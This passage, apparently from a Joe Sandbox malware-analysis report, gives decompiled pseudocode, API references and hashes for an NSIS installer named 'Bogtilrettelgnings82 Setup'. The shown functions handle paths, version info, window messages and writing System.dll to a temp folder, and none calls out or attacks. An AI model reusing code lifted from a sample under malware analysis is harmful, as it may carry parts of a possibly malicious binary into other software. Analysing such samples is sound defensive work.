                                                            						asm("sbb eax, eax");
                                                            						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                            					}
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                            				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                            					_push( *(_t55 - 8));
                                                            					E00405C3C();
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t55 - 4));
                                                            				return 0;
                                                            			}












                                                            0x00401bc1
                                                            0x00401bcd
                                                            0x00401bd0
                                                            0x00401bd9
                                                            0x00401bd9
                                                            0x00401bdc
                                                            0x00401be0
                                                            0x00401be9
                                                            0x00401be9
                                                            0x00401bec
                                                            0x00401bf0
                                                            0x00401bf2
                                                            0x00401c3f
                                                            0x00401c41
                                                            0x00401c4a
                                                            0x00401c52
                                                            0x00401c55
                                                            0x00401c55
                                                            0x00401c5e
                                                            0x00000000
                                                            0x00401bf4
                                                            0x00401bfb
                                                            0x00401bfd
                                                            0x00401c05
                                                            0x00401c08
                                                            0x00401c30
                                                            0x00401c64
                                                            0x00401c64
                                                            0x00401c0a
                                                            0x00401c18
                                                            0x00401c20
                                                            0x00401c23
                                                            0x00401c23
                                                            0x00401c08
                                                            0x00401c67
                                                            0x00401c6a
                                                            0x00401c70
                                                            0x0040283a
                                                            0x0040283a
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                            • Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
                                                            • Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                            • Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004036D2() {
                                                            				void* _t2;
                                                            				void* _t3;
                                                            				void* _t6;
                                                            				void* _t8;
                                                            
                                                            				_t8 =  *0x41eca4; // 0x70ef78
                                                            				_t3 = E004036B7(_t2, 0);
                                                            				if(_t8 != 0) {
                                                            					do {
                                                            						_t6 = _t8;
                                                            						_t8 =  *_t8;
                                                            						FreeLibrary( *(_t6 + 8));
                                                            						_t3 = GlobalFree(_t6);
                                                            					} while (_t8 != 0);
                                                            				}
                                                            				 *0x41eca4 =  *0x41eca4 & 0x00000000;
                                                            				return _t3;
                                                            			}







                                                            0x004036d3
                                                            0x004036db
                                                            0x004036e2
                                                            0x004036e5
                                                            0x004036e5
                                                            0x004036e7
                                                            0x004036ec
                                                            0x004036f3
                                                            0x004036f9
                                                            0x004036fd
                                                            0x004036fe
                                                            0x00403706

                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,776C2EE0,004036A9,776C3410,004034D6,?), ref: 004036EC
                                                            • GlobalFree.KERNEL32(0070EF78), ref: 004036F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$xp
                                                            • API String ID: 1100898210-2549752494
                                                            • Opcode ID: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                            • Instruction ID: d9d7596a2fa150d819e6a74e3d7b6637a3ae96b25f0f67a325cd61ef5fdce0bc
                                                            • Opcode Fuzzy Hash: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                            • Instruction Fuzzy Hash: 98E08C32801020ABC6215F65AD0475ABB687F88B22F06082AE8007B3A09BB66C815AC9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040576E(CHAR* _a4) {
                                                            				CHAR* _t7;
                                                            
                                                            				_t7 = _a4;
                                                            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                            					lstrcatA(_t7, 0x409014);
                                                            				}
                                                            				return _t7;
                                                            			}




                                                            0x0040576f
                                                            0x00405786
                                                            0x0040578e
                                                            0x0040578e
                                                            0x00405796

                                                            APIs
                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405774
                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 0040577D
                                                            • lstrcatA.KERNEL32(?,00409014), ref: 0040578E
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-3355392842
                                                            • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                            • Instruction ID: 1a6830d2c1c169c874c5ca2981f80c8a3f1a40f12e9be47e1b60bd4f3e9b1918
                                                            • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                            • Instruction Fuzzy Hash: 9BD0A9A2609A306AE20222199C05E8F6A08CF02300B040032F605B62A2C63C0E429BFE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E00401EDC(char __ebx, char* __edi, char* __esi) {
                                                            				char* _t18;
                                                            				int _t19;
                                                            				void* _t30;
                                                            
                                                            				_t18 = E004029FD(0xffffffee);
                                                            				 *(_t30 - 0x2c) = _t18;
                                                            				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                            				 *__esi = __ebx;
                                                            				 *(_t30 - 8) = _t19;
                                                            				 *__edi = __ebx;
                                                            				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                            				if(_t19 != __ebx) {
                                                            					__eax = GlobalAlloc(0x40, __eax);
                                                            					 *(__ebp + 8) = __eax;
                                                            					if(__eax != __ebx) {
                                                            						if(__eax != 0) {
                                                            							__ebp - 0x44 = __ebp - 0x34;
                                                            							if(VerQueryValueA( *(__ebp + 8), 0x409014, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                            								 *(__ebp - 0x34) = E00405C3C(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                            								 *(__ebp - 0x34) = E00405C3C(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                            								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                            							}
                                                            						}
                                                            						_push( *(__ebp + 8));
                                                            						GlobalFree();
                                                            					}
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t30 - 4));
                                                            				return 0;
                                                            			}






                                                            0x00401ede
                                                            0x00401ee6
                                                            0x00401eeb
                                                            0x00401ef0
                                                            0x00401ef4
                                                            0x00401ef7
                                                            0x00401ef9
                                                            0x00401f00
                                                            0x00401f09
                                                            0x00401f11
                                                            0x00401f14
                                                            0x00401f29
                                                            0x00401f2f
                                                            0x00401f42
                                                            0x00401f4b
                                                            0x00401f57
                                                            0x00401f5c
                                                            0x00401f5c
                                                            0x00401f42
                                                            0x00401f5f
                                                            0x00401b80
                                                            0x00401b80
                                                            0x00401f14
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                            • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                              • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                            • String ID:
                                                            • API String ID: 1404258612-0
                                                            • Opcode ID: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                            • Instruction ID: b3fcdbc9dd76458da788cdf58b6f95538f5ce151b2f15d12b0a955ad6fee60ce
                                                            • Opcode Fuzzy Hash: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                            • Instruction Fuzzy Hash: F31173B1900218BEDB01EFA5DD41D9EBBB9EF04344F10807AF505F61A1E7389E54DB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405807(CHAR* _a4) {
                                                            				CHAR* _t5;
                                                            				char* _t7;
                                                            				CHAR* _t9;
                                                            				char _t10;
                                                            				CHAR* _t11;
                                                            				void* _t13;
                                                            
                                                            				_t11 = _a4;
                                                            				_t9 = CharNextA(_t11);
                                                            				_t5 = CharNextA(_t9);
                                                            				_t10 =  *_t11;
                                                            				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                                            					if(_t10 != 0x5c || _t11[1] != _t10) {
                                                            						L10:
                                                            						return 0;
                                                            					} else {
                                                            						_t13 = 2;
                                                            						while(1) {
                                                            							_t13 = _t13 - 1;
                                                            							_t7 = E00405799(_t5, 0x5c);
                                                            							if( *_t7 == 0) {
                                                            								goto L10;
                                                            							}
                                                            							_t5 = _t7 + 1;
                                                            							if(_t13 != 0) {
                                                            								continue;
                                                            							}
                                                            							return _t5;
                                                            						}
                                                            						goto L10;
                                                            					}
                                                            				} else {
                                                            					return CharNextA(_t5);
                                                            				}
                                                            			}









                                                            0x00405810
                                                            0x00405817
                                                            0x0040581a
                                                            0x0040581c
                                                            0x00405820
                                                            0x00405835
                                                            0x00405854
                                                            0x00000000
                                                            0x0040583c
                                                            0x0040583e
                                                            0x0040583f
                                                            0x00405842
                                                            0x00405843
                                                            0x0040584b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040584d
                                                            0x00405850
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405850
                                                            0x00000000
                                                            0x0040583f
                                                            0x0040582d
                                                            0x00000000
                                                            0x0040582e

                                                            APIs
                                                            • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,00405873,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,?,776C2EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 00405815
                                                            • CharNextA.USER32(00000000), ref: 0040581A
                                                            • CharNextA.USER32(00000000), ref: 0040582E
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsq8C22.tmp, xrefs: 00405808
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CharNext
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp
                                                            • API String ID: 3213498283-746621221
                                                            • Opcode ID: 180c61c53d858fd4c5624aa8e60612970d78334aec32c9cd585625149e8e1fa8
                                                            • Instruction ID: 7fee62fa1586e0402133b65fdba7f53f84a5380dec521f77411adb64ad0fd030
                                                            • Opcode Fuzzy Hash: 180c61c53d858fd4c5624aa8e60612970d78334aec32c9cd585625149e8e1fa8
                                                            • Instruction Fuzzy Hash: B7F0C253948F502AFF3272240C50B675B88CB55310F08807FEA806A2C2827C88648B9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E0040585C(void* __eflags, intOrPtr _a4) {
                                                            				int _t11;
                                                            				signed char* _t12;
                                                            				intOrPtr _t18;
                                                            				intOrPtr* _t21;
                                                            				void* _t22;
                                                            
                                                            				E00405CDE(0x4210e8, _a4);
                                                            				_t21 = E00405807(0x4210e8);
                                                            				if(_t21 != 0) {
                                                            					E00405F49(_t21);
                                                            					if(( *0x4236f8 & 0x00000080) == 0) {
                                                            						L5:
                                                            						_t22 = _t21 - 0x4210e8;
                                                            						while(1) {
                                                            							_t11 = lstrlenA(0x4210e8);
                                                            							_push(0x4210e8);
                                                            							if(_t11 <= _t22) {
                                                            								break;
                                                            							}
                                                            							_t12 = E00405FE2();
                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                            								E004057B5(0x4210e8);
                                                            								continue;
                                                            							} else {
                                                            								goto L1;
                                                            							}
                                                            						}
                                                            						E0040576E();
                                                            						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                            					}
                                                            					_t18 =  *_t21;
                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                            						goto L1;
                                                            					} else {
                                                            						goto L5;
                                                            					}
                                                            				}
                                                            				L1:
                                                            				return 0;
                                                            			}








                                                            0x00405868
                                                            0x00405873
                                                            0x00405877
                                                            0x0040587e
                                                            0x0040588a
                                                            0x00405896
                                                            0x00405896
                                                            0x004058ae
                                                            0x004058af
                                                            0x004058b6
                                                            0x004058b7
                                                            0x00000000
                                                            0x00000000
                                                            0x0040589a
                                                            0x004058a1
                                                            0x004058a9
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004058a1
                                                            0x004058b9
                                                            0x00000000
                                                            0x004058cd
                                                            0x0040588c
                                                            0x00405890
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405890
                                                            0x00405879
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Bogtilrettelgnings82 Setup,NSIS Error), ref: 00405CEB
                                                              • Part of subcall function 00405807: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,00405873,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,?,776C2EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 00405815
                                                              • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040581A
                                                              • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040582E
                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,?,776C2EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 004058AF
                                                            • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,?,?,776C2EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,776C2EE0), ref: 004058BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp
                                                            • API String ID: 3248276644-746621221
                                                            • Opcode ID: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
                                                            • Instruction ID: 0290d7001013104458bc3aa2bb8d01bb7a9b645cc3bbf10b8819f4698bd01a3e
                                                            • Opcode Fuzzy Hash: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
                                                            • Instruction Fuzzy Hash: F3F0C827105E5536D626323B1D45E9F2A49CD82328718853BFC61B22D1EA3CC863DD7E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E00404F3D(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                            				int _t11;
                                                            				int _t15;
                                                            				long _t16;
                                                            
                                                            				_t15 = _a8;
                                                            				if(_t15 != 0x102) {
                                                            					__eflags = _t15 - 0x200;
                                                            					if(_t15 != 0x200) {
                                                            						_t16 = _a16;
                                                            						L7:
                                                            						__eflags = _t15 - 0x419;
                                                            						if(_t15 == 0x419) {
                                                            							__eflags =  *0x41fccc - _t16; // 0x0
                                                            							if(__eflags != 0) {
                                                            								_push(_t16);
                                                            								_push(6);
                                                            								 *0x41fccc = _t16;
                                                            								E00404914();
                                                            							}
                                                            						}
                                                            						L11:
                                                            						return CallWindowProcA( *0x41fcd4, _a4, _t15, _a12, _t16);
                                                            					}
                                                            					_t11 = IsWindowVisible(_a4);
                                                            					__eflags = _t11;
                                                            					if(_t11 == 0) {
                                                            						L10:
                                                            						_t16 = _a16;
                                                            						goto L11;
                                                            					}
                                                            					_t16 = E00404894(_a4, 1);
                                                            					_t15 = 0x419;
                                                            					goto L7;
                                                            				}
                                                            				if(_a12 == 0x20) {
                                                            					E00404018(0x413);
                                                            					return 0;
                                                            				}
                                                            				goto L10;
                                                            			}






                                                            0x00404f41
                                                            0x00404f4b
                                                            0x00404f61
                                                            0x00404f67
                                                            0x00404f89
                                                            0x00404f8c
                                                            0x00404f8c
                                                            0x00404f92
                                                            0x00404f94
                                                            0x00404f9a
                                                            0x00404f9c
                                                            0x00404f9d
                                                            0x00404f9f
                                                            0x00404fa5
                                                            0x00404fa5
                                                            0x00404f9a
                                                            0x00404faf
                                                            0x00000000
                                                            0x00404fbd
                                                            0x00404f6c
                                                            0x00404f72
                                                            0x00404f74
                                                            0x00404fac
                                                            0x00404fac
                                                            0x00000000
                                                            0x00404fac
                                                            0x00404f80
                                                            0x00404f82
                                                            0x00000000
                                                            0x00404f82
                                                            0x00404f51
                                                            0x00404f58
                                                            0x00000000
                                                            0x00404f5d
                                                            0x00000000

                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00404F6C
                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404FBD
                                                              • Part of subcall function 00404018: SendMessageA.USER32(000103CA,00000000,00000000,00000000), ref: 0040402A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                            • Instruction ID: afe80570641b081ecec8a2a4254b7c73db9dd8a02ece8fbff1c9a9ba965e2ecd
                                                            • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                            • Instruction Fuzzy Hash: EB0175F110424AAFDF209F51DD81A9B3725E7C4750F144037FB007A2D1D7798C62AB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004024D1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                            				int _t5;
                                                            				long _t7;
                                                            				struct _OVERLAPPED* _t11;
                                                            				intOrPtr* _t15;
                                                            				void* _t17;
                                                            				int _t21;
                                                            
                                                            				_t15 = __esi;
                                                            				_t11 = __ebx;
                                                            				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                            					_t7 = lstrlenA(E004029FD(0x11));
                                                            				} else {
                                                            					E004029E0(1);
                                                            					 *0x4097b0 = __al;
                                                            				}
                                                            				if( *_t15 == _t11) {
                                                            					L8:
                                                            					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                            				} else {
                                                            					_t5 = WriteFile(E00405C55(_t17 + 8, _t15), "C:\Users\Arthur\AppData\Local\Temp\nsq8C22.tmp\System.dll", _t7, _t17 + 8, _t11);
                                                            					_t21 = _t5;
                                                            					if(_t21 == 0) {
                                                            						goto L8;
                                                            					}
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t17 - 4));
                                                            				return 0;
                                                            			}









                                                            0x004024d1
                                                            0x004024d1
                                                            0x004024d4
                                                            0x004024ef
                                                            0x004024d6
                                                            0x004024d8
                                                            0x004024dd
                                                            0x004024e4
                                                            0x004024f6
                                                            0x00402663
                                                            0x00402663
                                                            0x004024fc
                                                            0x0040250e
                                                            0x004015a6
                                                            0x004015a8
                                                            0x00000000
                                                            0x004015ae
                                                            0x004015a8
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll, xrefs: 004024DD, 00402502
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
